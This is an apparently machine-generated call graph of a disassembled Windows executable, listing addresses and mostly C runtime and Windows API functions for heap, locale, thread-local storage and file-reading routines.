31dd64 21214->21219 21216->21212 21217 319744 ___free_lconv_mon 14 API calls 21217->21178 21221 31db4a 21218->21221 21222 315b2b __dosmaperr 14 API calls 21219->21222 21225 315b2b __dosmaperr 14 API calls 21221->21225 21222->21228 21223->21228 21253 31d576 21223->21253 21240 31d730 21224->21240 21225->21228 21228->21217 21230 31dfc3 _Fputc 21229->21230 21231 31dece __fread_nolock 41 API calls 21230->21231 21232 31dfd8 21231->21232 21233 31151b _Fputc 39 API calls 21232->21233 21234 31dfe7 21233->21234 21234->21191 21236 315b2b __dosmaperr 14 API calls 21235->21236 21237 315aef __dosmaperr 21236->21237 21238 315b3e __dosmaperr 14 API calls 21237->21238 21239 315b02 21238->21239 21239->21228 21259 31d429 21240->21259 21242 31f2e9 __fread_nolock MultiByteToWideChar 21243 31d844 21242->21243 21245 31d84d GetLastError 21243->21245 21246 31d778 21243->21246 21244 31d7c2 21247 315b3e __dosmaperr 14 API calls 21244->21247 21250 315ae4 __dosmaperr 14 API calls 21245->21250 21246->21228 21247->21246 21248 31d7d2 21251 31d78c 21248->21251 21252 31dfaf __fread_nolock 41 API calls 21248->21252 21250->21246 21251->21242 21252->21251 21254 31d5b0 21253->21254 21255 31d646 ReadFile 21254->21255 21256 31d641 21254->21256 21255->21256 21257 31d663 21255->21257 21256->21228 21257->21256 21258 31dfaf __fread_nolock 41 API calls 21257->21258 21258->21256 21260 31d45d 21259->21260 21261 31d4ce ReadFile 21260->21261 21262 31d4c9 21260->21262 21261->21262 21263 31d4e7 21261->21263 21262->21244 21262->21246 21262->21248 21262->21251 21263->21262 21264 31dfaf __fread_nolock 41 API calls 21263->21264 21264->21262 21265->21165 17864 313921 17867 319744 17864->17867 17868 313939 17867->17868 17869 31974f RtlFreeHeap 17867->17869 17869->17868 17870 319764 GetLastError 17869->17870 17871 319771 __dosmaperr 17870->17871 17873 315b3e 17871->17873 17876 319501 GetLastError 17873->17876 17875 315b43 17875->17868 17877 319517 17876->17877 17880 31951d 17876->17880 17899 31ae0f 17877->17899 17896 319521 SetLastError 17880->17896 17904 31ae4e 17880->17904 17885 319567 17888 31ae4e __Getctype 6 API calls 17885->17888 17886 319556 17887 31ae4e __Getctype 6 API calls 17886->17887 17889 319564 17887->17889 17890 319573 17888->17890 17894 319744 ___free_lconv_mon 12 API calls 17889->17894 17891 319577 17890->17891 17892 31958e 17890->17892 17893 31ae4e __Getctype 6 API calls 17891->17893 17916 3191de 17892->17916 17893->17889 17894->17896 17896->17875 17898 319744 ___free_lconv_mon 12 API calls 17898->17896 17921 31ac78 17899->17921 17901 31ae2b 17902 31ae34 17901->17902 17903 31ae46 TlsGetValue 17901->17903 17902->17880 17905 31ac78 std::_Lockit::_Lockit 5 API calls 17904->17905 17906 31ae6a 17905->17906 17907 319539 17906->17907 17908 31ae88 TlsSetValue 17906->17908 17907->17896 17909 3196e7 17907->17909 17914 3196f4 __Getctype 17909->17914 17910 319734 17913 315b3e __dosmaperr 13 API calls 17910->17913 17911 31971f RtlAllocateHeap 17912 31954e 17911->17912 17911->17914 17912->17885 17912->17886 17913->17912 17914->17910 17914->17911 17935 3163fa 17914->17935 17949 319072 17916->17949 17922 31aca8 17921->17922 17926 31aca4 std::_Lockit::_Lockit 17921->17926 17922->17926 17927 31abad 17922->17927 17925 31acc2 GetProcAddress 17925->17926 17926->17901 17933 31abbe ___vcrt_FlsSetValue 17927->17933 17928 31ac54 17928->17925 17928->17926 17929 31abdc LoadLibraryExW 17930 31abf7 GetLastError 17929->17930 17931 31ac5b 17929->17931 17930->17933 17931->17928 17932 31ac6d FreeLibrary 17931->17932 17932->17928 17933->17928 17933->17929 17934 31ac2a LoadLibraryExW 17933->17934 17934->17931 17934->17933 17938 316426 17935->17938 17939 316432 ___scrt_is_nonwritable_in_current_image 17938->17939 17944 313a77 EnterCriticalSection 17939->17944 17941 31643d __InternalCxxFrameHandler 17945 316474 17941->17945 17944->17941 17948 313abf LeaveCriticalSection 17945->17948 17947 316405 17947->17914 17948->17947 17950 31907e ___scrt_is_nonwritable_in_current_image 17949->17950 17963 313a77 EnterCriticalSection 17950->17963 17952 319088 17964 3190b8 17952->17964 17955 319184 17956 319190 ___scrt_is_nonwritable_in_current_image 17955->17956 17968 313a77 EnterCriticalSection 17956->17968 17958 31919a 17969 319365 17958->17969 17960 3191b2 17973 3191d2 17960->17973 17963->17952 17967 313abf LeaveCriticalSection 17964->17967 17966 3190a6 17966->17955 17967->17966 17968->17958 17970 31939b __Getctype 17969->17970 17971 319374 __Getctype 17969->17971 17970->17960 17971->17970 17976 32151a 17971->17976 18090 313abf LeaveCriticalSection 17973->18090 17975 3191c0 17975->17898 17977 32159a 17976->17977 17982 321530 17976->17982 17978 3215e8 17977->17978 17980 319744 ___free_lconv_mon 14 API calls 17977->17980 18044 32168b 17978->18044 17983 3215bc 17980->17983 17981 321563 17984 321585 17981->17984 17993 319744 ___free_lconv_mon 14 API calls 17981->17993 17982->17977 17982->17981 17987 319744 ___free_lconv_mon 14 API calls 17982->17987 17985 319744 ___free_lconv_mon 14 API calls 17983->17985 17986 319744 ___free_lconv_mon 14 API calls 17984->17986 17988 3215cf 17985->17988 17989 32158f 17986->17989 17991 321558 17987->17991 17994 319744 ___free_lconv_mon 14 API calls 17988->17994 17997 319744 ___free_lconv_mon 14 API calls 17989->17997 17990 321656 17998 319744 ___free_lconv_mon 14 API calls 17990->17998 18004 32081e 17991->18004 17992 3215f6 17992->17990 18003 319744 14 API calls ___free_lconv_mon 17992->18003 17995 32157a 17993->17995 17996 3215dd 17994->17996 18032 320c7d 17995->18032 18001 319744 ___free_lconv_mon 14 API calls 17996->18001 17997->17977 18002 32165c 17998->18002 18001->17978 18002->17970 18003->17992 18005 32082f 18004->18005 18031 320918 18004->18031 18006 320840 18005->18006 18008 319744 ___free_lconv_mon 14 API calls 18005->18008 18007 320852 18006->18007 18009 319744 ___free_lconv_mon 14 API calls 18006->18009 18010 320864 18007->18010 18011 319744 ___free_lconv_mon 14 API calls 18007->18011 18008->18006 18009->18007 18012 320876 18010->18012 18013 319744 ___free_lconv_mon 14 API calls 18010->18013 18011->18010 18014 320888 18012->18014 18015 319744 ___free_lconv_mon 14 API calls 18012->18015 18013->18012 18016 319744 ___free_lconv_mon 14 API calls 18014->18016 18017 32089a 18014->18017 18015->18014 18016->18017 18018 319744 ___free_lconv_mon 14 API calls 18017->18018 18019 3208ac 18017->18019 18018->18019 18020 3208be 18019->18020 18021 319744 ___free_lconv_mon 14 API calls 18019->18021 18022 3208d0 18020->18022 18024 319744 ___free_lconv_mon 14 API calls 18020->18024 18021->18020 18023 3208e2 18022->18023 18025 319744 ___free_lconv_mon 14 API calls 18022->18025 18026 3208f4 18023->18026 18027 319744 ___free_lconv_mon 14 API calls 18023->18027 18024->18022 18025->18023 18028 320906 18026->18028 18029 319744 ___free_lconv_mon 14 API calls 18026->18029 18027->18026 18030 319744 ___free_lconv_mon 14 API calls 18028->18030 18028->18031 18029->18028 18030->18031 18031->17981 18033 320c8a 18032->18033 18043 320ce2 18032->18043 18034 320c9a 18033->18034 18036 319744 ___free_lconv_mon 14 API calls 18033->18036 18035 320cac 18034->18035 18037 319744 ___free_lconv_mon 14 API calls 18034->18037 18038 320cbe 18035->18038 18039 319744 ___free_lconv_mon 14 API calls 18035->18039 18036->18034 18037->18035 18040 320cd0 18038->18040 18041 319744 ___free_lconv_mon 14 API calls 18038->18041 18039->18038 18042 319744 ___free_lconv_mon 14 API calls 18040->18042 18040->18043 18041->18040 18042->18043 18043->17984 18045 321698 18044->18045 18049 3216b7 18044->18049 18045->18049 18050 3211a4 18045->18050 18048 319744 ___free_lconv_mon 14 API calls 18048->18049 18049->17992 18051 321282 18050->18051 18052 3211b5 18050->18052 18051->18048 18086 320f03 18052->18086 18055 320f03 __Getctype 14 API calls 18056 3211c8 18055->18056 18057 320f03 __Getctype 14 API calls 18056->18057 18058 3211d3 18057->18058 18059 320f03 __Getctype 14 API calls 18058->18059 18060 3211de 18059->18060 18061 320f03 __Getctype 14 API calls 18060->18061 18062 3211ec 18061->18062 18063 319744 ___free_lconv_mon 14 API calls 18062->18063 18064 3211f7 18063->18064 18065 319744 ___free_lconv_mon 14 API calls 18064->18065 18066 321202 18065->18066 18067 319744 ___free_lconv_mon 14 API calls 18066->18067 18068 32120d 18067->18068 18069 320f03 __Getctype 14 API calls 18068->18069 18070 32121b 18069->18070 18071 320f03 __Getctype 14 API calls 18070->18071 18072 321229 18071->18072 18073 320f03 __Getctype 14 API calls 18072->18073 18074 32123a 18073->18074 18075 320f03 __Getctype 14 API calls 18074->18075 18076 321248 18075->18076 18077 320f03 __Getctype 14 API calls 18076->18077 18078 321256 18077->18078 18079 319744 ___free_lconv_mon 14 API calls 18078->18079 18080 321261 18079->18080 18081 319744 ___free_lconv_mon 14 API calls 18080->18081 18082 32126c 18081->18082 18083 319744 ___free_lconv_mon 14 API calls 18082->18083 18084 321277 18083->18084 18085 319744 ___free_lconv_mon 14 API calls 18084->18085 18085->18051 18088 320f15 18086->18088 18087 320f24 18087->18055 18088->18087 18089 319744 ___free_lconv_mon 14 API calls 18088->18089 18089->18088 18090->17975 19790 301022 19795 30b6b0 19790->19795 19792 301035 19799 30d033 19792->19799 19796 30b6bc __EH_prolog3 19795->19796 19802 308540 19796->19802 19798 30b70e codecvt 19798->19792 19856 30d005 19799->19856 19803 30cd92 codecvt 41 API calls 19802->19803 19804 3085b4 19803->19804 19813 30c465 19804->19813 19806 3085c4 19807 308670 76 API calls 19806->19807 19808 3085f7 19807->19808 19809 30863a 19808->19809 19810 3023a0 41 API calls 19808->19810 19811 308646 19809->19811 19825 30c67e 19809->19825 19810->19809 19811->19798 19814 30c471 __EH_prolog3 19813->19814 19815 30b56a std::_Lockit::_Lockit 7 API calls 19814->19815 19816 30c47c 19815->19816 19824 30c4ad 19816->19824 19830 30c5c9 19816->19830 19818 30b5c2 std::_Lockit::~_Lockit 2 API calls 19820 30c4ea codecvt 19818->19820 19819 30c48f 19836 30c5ec 19819->19836 19820->19806 19823 30c3bc _Yarn 15 API calls 19823->19824 19824->19818 19826 30b56a std::_Lockit::_Lockit 7 API calls 19825->19826 19827 30c68c 19826->19827 19828 30b5c2 std::_Lockit::~_Lockit 2 API calls 19827->19828 19829 30c6c7 19828->19829 19829->19811 19831 30cd92 codecvt 41 API calls 19830->19831 19832 30c5d4 19831->19832 19833 30c5e8 19832->19833 19840 30c2fb 19832->19840 19833->19819 19837 30c5f8 19836->19837 19838 30c497 19836->19838 19843 30cb62 19837->19843 19838->19823 19841 30c3bc _Yarn 15 API calls 19840->19841 19842 30c335 19841->19842 19842->19819 19844 315b51 19843->19844 19845 30cb72 EncodePointer 19843->19845 19846 31eecc __InternalCxxFrameHandler 2 API calls 19844->19846 19845->19838 19845->19844 19847 315b56 19846->19847 19848 315b61 19847->19848 19849 31ef11 __InternalCxxFrameHandler 39 API calls 19847->19849 19850 315b6b IsProcessorFeaturePresent 19848->19850 19851 315b8a 19848->19851 19849->19848 19852 315b77 19850->19852 19853 311b3f __InternalCxxFrameHandler 21 API calls 19851->19853 19854 3115e3 __InternalCxxFrameHandler 8 API calls 19852->19854 19855 315b94 19853->19855 19854->19851 19857 30d014 19856->19857 19858 30d01b 19856->19858 19862 316db4 19857->19862 19865 316e31 19858->19865 19861 30103f 19863 316e31 42 API calls 19862->19863 19864 316dc6 19863->19864 19864->19861 19868 316b7d 19865->19868 19869 316b89 ___scrt_is_nonwritable_in_current_image 19868->19869 19876 313a77 EnterCriticalSection 19869->19876 19871 316b97 19877 316bd8 19871->19877 19873 316ba4 19887 316bcc 19873->19887 19876->19871 19878 316bf3 19877->19878 19886 316c66 std::_Lockit::_Lockit 19877->19886 19885 316c46 19878->19885 19878->19886 19890 320310 19878->19890 19880 320310 42 API calls 19882 316c5c 19880->19882 19881 316c3c 19884 319744 ___free_lconv_mon 14 API calls 19881->19884 19883 319744 ___free_lconv_mon 14 API calls 19882->19883 19883->19886 19884->19885 19885->19880 19885->19886 19886->19873 19918 313abf LeaveCriticalSection 19887->19918 19889 316bb5 19889->19861 19891 320338 19890->19891 19892 32031d 19890->19892 19894 320347 19891->19894 19899 3258af 19891->19899 19892->19891 19893 320329 19892->19893 19895 315b3e __dosmaperr 14 API calls 19893->19895 19906 31f103 19894->19906 19898 32032e __fread_nolock 19895->19898 19898->19881 19900 3258ba 19899->19900 19901 3258cf HeapSize 19899->19901 19902 315b3e __dosmaperr 14 API calls 19900->19902 19901->19894 19903 3258bf 19902->19903 19904 3117df __fread_nolock 39 API calls 19903->19904 19905 3258ca 19904->19905 19905->19894 19907 31f110 19906->19907 19908 31f11b 19906->19908 19909 31977e std::_Locinfo::_Locinfo_dtor 15 API calls 19907->19909 19910 31f123 19908->19910 19916 31f12c __Getctype 19908->19916 19915 31f118 19909->19915 19913 319744 ___free_lconv_mon 14 API calls 19910->19913 19911 31f131 19914 315b3e __dosmaperr 14 API calls 19911->19914 19912 31f156 HeapReAlloc 19912->19915 19912->19916 19913->19915 19914->19915 19915->19898 19916->19911 19916->19912 19917 3163fa codecvt 2 API calls 19916->19917 19917->19916 19918->19889 22619 30bf08 22620 30bf40 22619->22620 22621 30bf11 22619->22621 22621->22620 22624 3140e4 22621->22624 22623 30bf33 22625 3140f6 22624->22625 22627 3140ff ___scrt_uninitialize_crt 22624->22627 22626 313f6c ___scrt_uninitialize_crt 68 API calls 22625->22626 22628 3140fc 22626->22628 22629 31410e 22627->22629 22632 313f0c 22627->22632 22628->22623 22629->22623 22633 313f18 ___scrt_is_nonwritable_in_current_image 22632->22633 22640 313c57 EnterCriticalSection 22633->22640 22635 313f26 22636 314076 ___scrt_uninitialize_crt 68 API calls 22635->22636 22637 313f37 22636->22637 22641 313f60 22637->22641 22640->22635 22644 313c6b LeaveCriticalSection 22641->22644 22643 313f49 22643->22623 22644->22643 18562 30d10d 18563 30d119 ___scrt_is_nonwritable_in_current_image 18562->18563 18588 30ce6c 18563->18588 18565 30d120 18566 30d273 18565->18566 18576 30d14a ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 18565->18576 18711 30d779 IsProcessorFeaturePresent 18566->18711 18568 30d27a 18693 311b7b 18568->18693 18571 311b3f __InternalCxxFrameHandler 21 API calls 18572 30d288 18571->18572 18573 30d169 18574 30d1ea 18596 30d88e 18574->18596 18576->18573 18576->18574 18696 311b55 18576->18696 18577 30d1f0 18599 3059a0 18577->18599 18589 30ce75 18588->18589 18715 30d2a1 IsProcessorFeaturePresent 18589->18715 18593 30ce86 18594 30ce8a 18593->18594 18725 30ff5d 18593->18725 18594->18565 18785 30ea20 18596->18785 18598 30d8a1 GetStartupInfoW 18598->18577 18600 3059b0 ___scrt_uninitialize_crt 18599->18600 18787 3138b9 GetSystemTimeAsFileTime 18600->18787 18602 3059b9 18789 311bbd 18602->18789 18606 3059ca 18798 308790 18606->18798 18610 305a6a 18611 308790 69 API calls 18610->18611 18612 305a81 18611->18612 18613 308a30 76 API calls 18612->18613 18614 305a87 18613->18614 18615 308790 69 API calls 18614->18615 18616 305a99 18615->18616 18816 3068e0 18616->18816 18619 308790 69 API calls 18620 305aad 18619->18620 18621 308a30 76 API calls 18620->18621 18650 305ab3 error_info_injector 18621->18650 18622 305ce6 18623 308790 69 API calls 18622->18623 18625 305cf5 18623->18625 18638 306d20 41 API calls 18638->18650 18650->18622 18650->18638 18659 306226 18650->18659 18826 30cd92 18650->18826 18837 311b9c 18650->18837 18840 309f90 18650->18840 18928 3015e0 18650->18928 18953 3117ef 18659->18953 18694 3119af __InternalCxxFrameHandler 21 API calls 18693->18694 18695 30d280 18694->18695 18695->18571 18697 311b6b ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 18696->18697 18697->18574 18698 3193b0 __Getctype 39 API calls 18697->18698 18701 318881 18698->18701 18699 315b51 CallUnexpected 39 API calls 18700 3188ab 18699->18700 18701->18699 18712 30d78f __InternalCxxFrameHandler __fread_nolock 18711->18712 18713 30d83a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18712->18713 18714 30d87e __InternalCxxFrameHandler 18713->18714 18714->18568 18716 30ce81 18715->18716 18717 30ff3e 18716->18717 18731 31105c 18717->18731 18721 30ff4f 18722 30ff5a 18721->18722 18745 311098 18721->18745 18722->18593 18724 30ff47 18724->18593 18726 30ff70 18725->18726 18727 30ff66 18725->18727 18726->18594 18728 310281 ___vcrt_uninitialize_ptd 6 API calls 18727->18728 18729 30ff6b 18728->18729 18730 311098 ___vcrt_uninitialize_locks DeleteCriticalSection 18729->18730 18730->18726 18732 311065 18731->18732 18734 31108e 18732->18734 18735 30ff43 18732->18735 18749 311411 18732->18749 18736 311098 ___vcrt_uninitialize_locks DeleteCriticalSection 18734->18736 18735->18724 18737 31024e 18735->18737 18736->18735 18766 311322 18737->18766 18740 310263 18740->18721 18743 31027e 18743->18721 18746 3110c2 18745->18746 18747 3110a3 18745->18747 18746->18724 18748 3110ad DeleteCriticalSection 18747->18748 18748->18746 18748->18748 18754 311237 18749->18754 18752 311449 InitializeCriticalSectionAndSpinCount 18753 311434 18752->18753 18753->18732 18755 311254 18754->18755 18758 311258 18754->18758 18755->18752 18755->18753 18756 3112c0 GetProcAddress 18756->18755 18758->18755 18758->18756 18759 3112b1 18758->18759 18761 3112d7 LoadLibraryExW 18758->18761 18759->18756 18760 3112b9 FreeLibrary 18759->18760 18760->18756 18762 31131e 18761->18762 18763 3112ee GetLastError 18761->18763 18762->18758 18763->18762 18764 3112f9 ___vcrt_FlsSetValue 18763->18764 18764->18762 18765 31130f LoadLibraryExW 18764->18765 18765->18758 18767 311237 ___vcrt_FlsSetValue 5 API calls 18766->18767 18768 31133c 18767->18768 18769 311355 TlsAlloc 18768->18769 18770 310258 18768->18770 18770->18740 18771 3113d3 18770->18771 18772 311237 ___vcrt_FlsSetValue 5 API calls 18771->18772 18773 3113ed 18772->18773 18774 311408 TlsSetValue 18773->18774 18775 310271 18773->18775 18774->18775 18775->18743 18776 310281 18775->18776 18777 310291 18776->18777 18778 31028b 18776->18778 18777->18740 18780 31135d 18778->18780 18781 311237 ___vcrt_FlsSetValue 5 API calls 18780->18781 18782 311377 18781->18782 18783 31138f TlsFree 18782->18783 18784 311383 18782->18784 18783->18784 18784->18777 18786 30ea37 18785->18786 18786->18598 18786->18786 18788 3138f2 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18787->18788 18788->18602 18790 3193b0 __Getctype 39 API calls 18789->18790 18791 3059c2 18790->18791 18792 30c7b8 18791->18792 18980 3153ea 18792->18980 18794 30c7c5 18795 30c7ca 18794->18795 18994 30ae0c 18794->18994 18795->18606 18799 3087c6 18798->18799 18803 30882c 18799->18803 19054 3082f0 18799->19054 18807 308861 18803->18807 19041 309ab0 18803->19041 18804 3089ec 18805 305a64 18804->18805 19062 308410 18804->19062 18808 308a30 18805->18808 19044 3023a0 18807->19044 18809 308a66 18808->18809 19221 308670 18809->19221 18814 3082f0 41 API calls 18815 308ab6 18814->18815 18815->18610 18817 306930 18816->18817 18818 3082f0 41 API calls 18817->18818 18819 306949 18817->18819 18818->18819 18825 3069a4 18819->18825 19609 308b00 18819->19609 18820 3023a0 41 API calls 18823 306a73 18820->18823 18822 305aa1 18822->18619 18823->18822 18824 308410 41 API calls 18823->18824 18824->18822 18825->18820 18829 30cd97 18826->18829 18827 315152 ___std_exception_copy 15 API calls 18827->18829 18828 30cdb1 18828->18650 18829->18827 18829->18828 18830 3163fa codecvt 2 API calls 18829->18830 18832 301190 Concurrency::cancel_current_task 18829->18832 18830->18829 18838 3193b0 __Getctype 39 API calls 18837->18838 18839 311ba1 18838->18839 18839->18650 18841 30a16b 18840->18841 18849 309fd1 18840->18849 18842 309d00 41 API calls 18841->18842 18843 309ff1 18845 30a166 18849->18843 18849->18845 18850 30a062 18849->18850 18851 30a038 18849->18851 18852 30a026 18849->18852 18851->18843 18851->18845 18929 30170a 18928->18929 18932 301604 18928->18932 18930 301230 41 API calls 18929->18930 18934 301678 18932->18934 18935 30166b 18932->18935 18937 30161a 18932->18937 18940 30162a _Yarn 18932->18940 18935->18937 18954 31172b __fread_nolock 39 API calls 18953->18954 18981 3153f6 18980->18981 18982 31540b 18980->18982 18983 315b3e __dosmaperr 14 API calls 18981->18983 18999 31b05e 18982->18999 18985 3153fb 18983->18985 18987 3117df __fread_nolock 39 API calls 18985->18987 18990 315406 18987->18990 18988 31542e 18988->18794 18989 315b3e __dosmaperr 14 API calls 18991 31541f 18989->18991 18990->18794 18992 315b3e __dosmaperr 14 API calls 18991->18992 18993 31542a 18992->18993 18993->18794 19005 30ad47 18994->19005 18998 30ae2b 19000 31ac78 std::_Lockit::_Lockit 5 API calls 18999->19000 19001 31b07a 19000->19001 19002 315b51 CallUnexpected 39 API calls 19001->19002 19004 315416 19001->19004 19003 31b09d 19002->19003 19004->18988 19004->18989 19011 3017b0 19005->19011 19008 30e360 19009 30e3a8 RaiseException 19008->19009 19010 30e37a 19008->19010 19009->18998 19010->19009 19014 30e0fd 19011->19014 19015 30e10a 19014->19015 19021 3017dd 19014->19021 19015->19015 19015->19021 19022 315152 19015->19022 19018 30e137 19038 313921 19018->19038 19021->19008 19027 31977e __Getctype 19022->19027 19023 3197bc 19025 315b3e __dosmaperr 14 API calls 19023->19025 19024 3197a7 RtlAllocateHeap 19026 30e127 19024->19026 19024->19027 19025->19026 19026->19018 19029 31890b 19026->19029 19027->19023 19027->19024 19028 3163fa codecvt 2 API calls 19027->19028 19028->19027 19030 318919 19029->19030 19031 318927 19029->19031 19030->19031 19036 31893f 19030->19036 19032 315b3e __dosmaperr 14 API calls 19031->19032 19033 31892f 19032->19033 19034 3117df __fread_nolock 39 API calls 19033->19034 19035 318939 19034->19035 19035->19018 19036->19035 19037 315b3e __dosmaperr 14 API calls 19036->19037 19037->19033 19039 319744 ___free_lconv_mon 14 API calls 19038->19039 19040 313939 19039->19040 19040->19021 19066 30c21b 19041->19066 19042 309ac6 19042->18807 19045 3023ba 19044->19045 19045->18804 19046 30e360 Concurrency::cancel_current_task RaiseException 19045->19046 19047 3023d2 19045->19047 19046->19047 19137 3022c0 19047->19137 19049 302408 19050 30e360 Concurrency::cancel_current_task RaiseException 19049->19050 19051 302417 19050->19051 19052 30e0fd ___std_exception_copy 40 API calls 19051->19052 19053 302444 19052->19053 19053->18804 19055 308327 19054->19055 19059 3083d8 19054->19059 19217 307980 19055->19217 19057 3083c7 19057->19059 19061 308410 41 API calls 19057->19061 19059->18803 19060 3023a0 41 API calls 19060->19057 19061->19059 19063 308471 19062->19063 19064 308446 19062->19064 19063->18805 19064->19063 19065 3023a0 41 API calls 19064->19065 19065->19063 19067 30c23d _Yarn 19066->19067 19069 30c22a 19066->19069 19067->19069 19070 314db3 19067->19070 19069->19042 19071 314dc6 _Fputc 19070->19071 19076 314b95 19071->19076 19073 314ddb 19074 31151b _Fputc 39 API calls 19073->19074 19075 314de8 19074->19075 19075->19069 19077 314ba3 19076->19077 19082 314bcb 19076->19082 19078 314bb0 19077->19078 19079 314bd2 19077->19079 19077->19082 19080 311762 _Fputc 39 API calls 19078->19080 19084 314aee 19079->19084 19080->19082 19082->19073 19085 314afa ___scrt_is_nonwritable_in_current_image 19084->19085 19092 313c57 EnterCriticalSection 19085->19092 19087 314b08 19093 314b49 19087->19093 19092->19087 19103 31a6f8 19093->19103 19100 314b3d 19136 313c6b LeaveCriticalSection 19100->19136 19102 314b26 19102->19073 19104 31a6ba 39 API calls 19103->19104 19106 31a709 19104->19106 19105 314b61 19110 314c0c 19105->19110 19106->19105 19123 31977e 19106->19123 19109 319744 ___free_lconv_mon 14 API calls 19109->19105 19113 314c1e 19110->19113 19114 314b7f 19110->19114 19111 314c2c 19112 311762 _Fputc 39 API calls 19111->19112 19112->19114 19113->19111 19113->19114 19118 314c62 _Yarn _Fputc 19113->19118 19119 31a7a3 19114->19119 19116 31a67e __fread_nolock 39 API calls 19116->19118 19117 31c6d2 ___scrt_uninitialize_crt 64 API calls 19117->19118 19118->19114 19118->19116 19118->19117 19130 31400d 19118->19130 19120 31a7ae 19119->19120 19121 314b15 19119->19121 19120->19121 19122 31400d ___scrt_uninitialize_crt 64 API calls 19120->19122 19121->19100 19122->19121 19124 3197bc 19123->19124 19129 31978c __Getctype 19123->19129 19126 315b3e __dosmaperr 14 API calls 19124->19126 19125 3197a7 RtlAllocateHeap 19127 3197ba 19125->19127 19125->19129 19126->19127 19127->19109 19128 3163fa codecvt EnterCriticalSection LeaveCriticalSection 19128->19129 19129->19124 19129->19125 19129->19128 19131 314026 19130->19131 19132 31404d 19130->19132 19131->19132 19133 31a67e __fread_nolock 39 API calls 19131->19133 19132->19118 19134 314042 19133->19134 19135 31c6d2 ___scrt_uninitialize_crt 64 API calls 19134->19135 19135->19132 19136->19102 19138 302321 19137->19138 19138->19138 19139 301500 41 API calls 19138->19139 19140 302335 19139->19140 19154 3018f0 19140->19154 19142 302371 error_info_injector 19142->19049 19143 30234b 19143->19142 19144 3117ef 39 API calls 19143->19144 19145 30239d 19144->19145 19145->19049 19146 30e360 Concurrency::cancel_current_task RaiseException 19145->19146 19147 3023d2 19145->19147 19146->19147 19148 3022c0 41 API calls 19147->19148 19149 302408 19148->19149 19150 30e360 Concurrency::cancel_current_task RaiseException 19149->19150 19151 302417 19150->19151 19152 30e0fd ___std_exception_copy 40 API calls 19151->19152 19153 302444 19152->19153 19153->19049 19171 306d20 19154->19171 19156 301931 19157 301957 19156->19157 19187 308c20 19156->19187 19159 3019c0 _Yarn 19157->19159 19160 308c20 41 API calls 19157->19160 19161 301a1f error_info_injector 19159->19161 19163 301adf 19159->19163 19160->19159 19162 30e0fd ___std_exception_copy 40 API calls 19161->19162 19166 301a7d 19162->19166 19165 3117ef 39 API calls 19163->19165 19164 301aac error_info_injector 19164->19143 19165->19166 19166->19164 19167 3117ef 39 API calls 19166->19167 19168 301ae9 19167->19168 19202 30e160 19168->19202 19170 301b05 error_info_injector 19170->19143 19172 306d48 19171->19172 19173 306df6 19172->19173 19178 306d59 19172->19178 19206 301230 19173->19206 19175 306d84 19179 30cd92 codecvt 41 API calls 19175->19179 19176 306dfb 19177 301190 Concurrency::cancel_current_task 41 API calls 19176->19177 19180 306d97 19177->19180 19178->19175 19181 306dc3 19178->19181 19182 306dcc 19178->19182 19183 306d5e _Yarn 19178->19183 19179->19180 19180->19183 19184 3117ef 39 API calls 19180->19184 19181->19175 19181->19176 19185 30cd92 codecvt 41 API calls 19182->19185 19183->19156 19186 306e05 error_info_injector 19184->19186 19185->19183 19186->19156 19188 308d62 19187->19188 19192 308c44 19187->19192 19189 301230 41 API calls 19188->19189 19190 308d67 19189->19190 19191 301190 Concurrency::cancel_current_task 41 API calls 19190->19191 19200 308c6a _Yarn 19191->19200 19194 308cb8 19192->19194 19195 308cab 19192->19195 19197 308c5a 19192->19197 19192->19200 19193 30cd92 codecvt 41 API calls 19193->19200 19198 30cd92 codecvt 41 API calls 19194->19198 19195->19190 19195->19197 19196 3117ef 39 API calls 19199 308d71 19196->19199 19197->19193 19198->19200 19200->19196 19201 308d20 _Yarn error_info_injector 19200->19201 19201->19157 19203 30e174 19202->19203 19204 30e16d 19202->19204 19203->19170 19205 313921 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 19204->19205 19205->19203 19209 30adec 19206->19209 19214 30acf2 19209->19214 19212 30e360 Concurrency::cancel_current_task RaiseException 19213 30ae0b 19212->19213 19215 3017b0 std::invalid_argument::invalid_argument 40 API calls 19214->19215 19216 30ad04 19215->19216 19216->19212 19218 3079b2 19217->19218 19219 3079cd 19218->19219 19220 3082f0 41 API calls 19218->19220 19219->19057 19219->19060 19220->19219 19246 30b56a 19221->19246 19224 30b56a std::_Lockit::_Lockit 7 API calls 19225 3086bb 19224->19225 19228 30b5c2 std::_Lockit::~_Lockit 2 API calls 19225->19228 19227 308768 19238 309ad0 19227->19238 19229 3086db 19228->19229 19236 308728 19229->19236 19259 301fa0 19229->19259 19231 308738 19232 308740 19231->19232 19233 30877b 19231->19233 19291 30c432 19232->19291 19297 301c90 19233->19297 19252 30b5c2 19236->19252 19239 309b0d 19238->19239 19240 309b26 19239->19240 19241 3082f0 41 API calls 19239->19241 19242 3023a0 41 API calls 19240->19242 19241->19240 19244 309c26 19242->19244 19243 308aaf 19243->18814 19244->19243 19245 308410 41 API calls 19244->19245 19245->19243 19247 30b579 19246->19247 19250 30b580 19246->19250 19303 313ad6 19247->19303 19249 308698 19249->19224 19249->19229 19250->19249 19308 30cade EnterCriticalSection 19250->19308 19253 313ae4 19252->19253 19254 30b5cc 19252->19254 19361 313abf LeaveCriticalSection 19253->19361 19256 30b5df 19254->19256 19360 30caec LeaveCriticalSection 19254->19360 19256->19227 19257 313aeb 19257->19227 19260 302134 19259->19260 19261 301fdc 19259->19261 19260->19231 19261->19260 19262 30cd92 codecvt 41 API calls 19261->19262 19263 301fec 19262->19263 19264 30b56a std::_Lockit::_Lockit 7 API calls 19263->19264 19265 30201e 19264->19265 19266 302060 19265->19266 19267 30214c 19265->19267 19362 30c563 19266->19362 19387 30ae2c 19267->19387 19292 315152 ___std_exception_copy 15 API calls 19291->19292 19293 30c43d 19292->19293 19294 30c444 19293->19294 19605 30adb2 19293->19605 19294->19236 19298 301c9e Concurrency::cancel_current_task 19297->19298 19299 30e360 Concurrency::cancel_current_task RaiseException 19298->19299 19300 301cac 19299->19300 19301 30e0fd ___std_exception_copy 40 API calls 19300->19301 19302 301cd3 19301->19302 19309 31b0a9 19303->19309 19308->19249 19330 31aa8f 19309->19330 19329 31b0db 19329->19329 19331 31ac78 std::_Lockit::_Lockit 5 API calls 